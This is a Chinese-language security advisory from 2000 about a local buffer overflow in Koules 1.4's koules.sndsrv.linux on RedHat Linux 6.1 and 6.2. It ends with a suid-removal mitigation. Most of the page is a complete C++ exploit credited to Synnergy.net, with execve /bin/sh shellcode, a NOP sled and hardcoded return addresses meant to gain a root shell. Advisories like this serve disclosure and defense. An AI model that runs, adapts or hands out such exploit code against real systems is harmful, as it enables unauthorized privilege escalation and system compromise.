安全研究
安全漏洞
Koules1.4 本地缓冲区溢出漏洞
发布日期:2000-11-21
更新日期:2000-11-21
受影响系统:
描述:
Koules1.4
- RedHat Linux 6.1
- RedHat Linux 6.2
Koules1.4 中所带的koules.sndsrv.linux在处理命令行参数时没有检查参数的
长度。攻击者可以利用此漏洞进行缓冲区溢出攻击,获得root权限。
只有编译时带了SVGALIB支持的以及没有X windows版本的'koules'的主机才可能
受此问题影响。
<* 来源:Scrippie(Scrippie/ronald@grafix.nl)
http://www.synnergy.net
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* Synnergy.net (c) 2000 */
#include <cstdio>
#include <string>
#include <cstdlib>
#include <unistd.h>
#define FILENAME "/usr/local/lib/koules/koules.sndsrv.linux"
#define NOP 'A'
#define NUMNOPS 500
#define RETADDY "\x90\xfe\xff\xbf"
/* Since we return in the cleared environment, we don't need to have a
return address we can influence by command line "offset" arguments */
string heavenlycode =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char *addytostr(unsigned char *);
using namespace std;
main()
{
string payload, vector;
unsigned int i;
const char *env[3];
const char *ptr_to_bffffffc;
/* Construction of our payload */
payload.append(NUMNOPS, NOP);
payload.append(heavenlycode);
env[0] = payload.c_str();
/* This memory address always contains 0x00000000 */
env[1] = "\xfc\xff\xff\xbf";
env[2] = NULL;
/* Calculate for yourself, and check out: linux/fs/exec.c */
ptr_to_bffffffc =
addytostr((unsigned char *)(0xc0000000-sizeof(void *)-sizeof(FILENAME)
-sizeof(heavenlycode)-sizeof(char *)-1));
for(i=0;i<256;i++) {
vector.append(RETADDY); /* Fill the buffer */
}
/* We do NOT overwrite 'int i' - a register is used after gcc -O */
vector.append(RETADDY); /* Overwrites ebp */
vector.append(RETADDY); /* Overwrites eip */
vector.append(ptr_to_bffffffc); /* Overwrites argv argument */
execle(FILENAME, "Segmentation fault (core dumped)", vector.c_str(), "A",
NULL, env);
perror("execle()");
}
char *addytostr(unsigned char *blaat)
{
char *ret;
if(!(ret = (char *)malloc(sizeof(unsigned char *)+1))) {
perror("malloc()");
exit(EXIT_FAILURE);
}
memcpy(ret, &blaat, sizeof(unsigned char *));
ret[sizeof(unsigned char *)] = 0x00;
return(ret);
}
建议:
临时解决方法:
去掉koules.sndsrv.linux的suid/sgid属性:
chmod a-s koules.sndsrv.linux
厂商补丁:
暂无
浏览次数:5325
严重程度:0(网友投票)
绿盟科技给您安全的保障